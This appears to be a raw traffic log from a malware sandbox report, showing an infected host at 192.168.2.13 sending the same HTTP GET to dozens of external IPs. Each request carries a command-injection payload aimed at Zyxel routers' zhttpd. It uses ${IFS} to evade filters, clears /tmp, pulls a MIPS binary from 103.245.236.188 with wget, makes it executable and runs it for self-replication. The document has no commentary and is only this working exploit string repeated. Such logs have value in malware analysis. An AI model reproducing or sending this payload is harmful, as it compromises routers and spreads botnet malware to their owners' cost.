                                    Jan 13, 2024 19:02:44.431525946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7070192.168.2.136096017.243.89.48443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431585073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7071192.168.2.136021269.240.178.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431634903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7072192.168.2.1345902110.151.32.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431674004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7073192.168.2.134349857.178.127.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431715965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7074192.168.2.1337334105.188.49.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431770086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7075192.168.2.135568219.235.181.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431849003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7076192.168.2.133517248.193.187.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431931973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7077192.168.2.133546647.89.116.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432005882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7078192.168.2.134237277.148.127.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432068110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7079192.168.2.135030097.86.231.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432118893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7080192.168.2.1338134100.4.86.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432143927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7081192.168.2.135558276.53.15.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432190895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7082192.168.2.13477649.194.200.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432252884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7083192.168.2.134964248.219.21.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432337999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7084192.168.2.133307824.121.133.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432358980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7085192.168.2.1337774206.153.17.51443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432410955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7086192.168.2.134832236.239.150.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432456017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7087192.168.2.1340904217.37.18.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432473898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7088192.168.2.1348566115.164.43.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432506084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7089192.168.2.135012242.22.75.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432543993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7090192.168.2.133829436.148.52.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432625055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7091192.168.2.1347568108.55.23.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432656050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7092192.168.2.1335110109.209.106.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432709932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7093192.168.2.1347490108.101.52.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432775021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7094192.168.2.1357422197.28.54.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432802916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7095192.168.2.1348436204.192.138.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432852983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7096192.168.2.134592263.1.70.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432899952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7097192.168.2.1344160162.251.123.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432945967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7098192.168.2.1348082113.178.39.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.432980061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7099192.168.2.133879458.51.244.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433043003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7100192.168.2.134642095.51.127.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433089972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7101192.168.2.1332814123.30.231.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433159113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7102192.168.2.133467235.135.71.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433195114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7103192.168.2.1346414128.198.235.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433234930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7104192.168.2.133788876.202.32.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433305979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7105192.168.2.135731265.56.158.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433350086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7106192.168.2.1357262209.154.114.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433409929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7107192.168.2.135471082.133.102.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433458090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7108192.168.2.134119263.127.76.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433511972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7109192.168.2.1339438135.90.53.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433542013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7110192.168.2.134931823.21.193.156443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433608055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7111192.168.2.133922268.218.91.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433677912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7112192.168.2.135388619.182.224.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433705091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7113192.168.2.134960894.192.25.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433763981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7114192.168.2.135447485.62.84.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433835030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7115192.168.2.1341332169.8.43.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.433897972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7116192.168.2.1344250218.251.211.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.438780069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7117192.168.2.1338342211.197.207.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.438838959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7118192.168.2.133656480.187.46.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.438901901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7119192.168.2.134436632.47.177.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.438966990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7120192.168.2.135949463.89.19.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.438999891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7121192.168.2.133440646.202.217.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.439065933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7122192.168.2.13578865.113.109.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.439116001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7123192.168.2.1347476140.2.243.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.439160109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7124192.168.2.1353290208.1.53.65443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.439215899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7125192.168.2.134802067.161.68.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.439264059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7126192.168.2.134767499.22.40.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.439512968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7127192.168.2.1341002122.167.85.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.439727068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7128192.168.2.134580644.129.197.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.439765930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7129192.168.2.1343972167.27.56.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.439825058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7130192.168.2.134023472.190.105.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.439910889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7131192.168.2.1353186154.234.7.254443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.439984083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7132192.168.2.1355730148.254.230.175443
                                    TimestampBytes transferredDirectionData
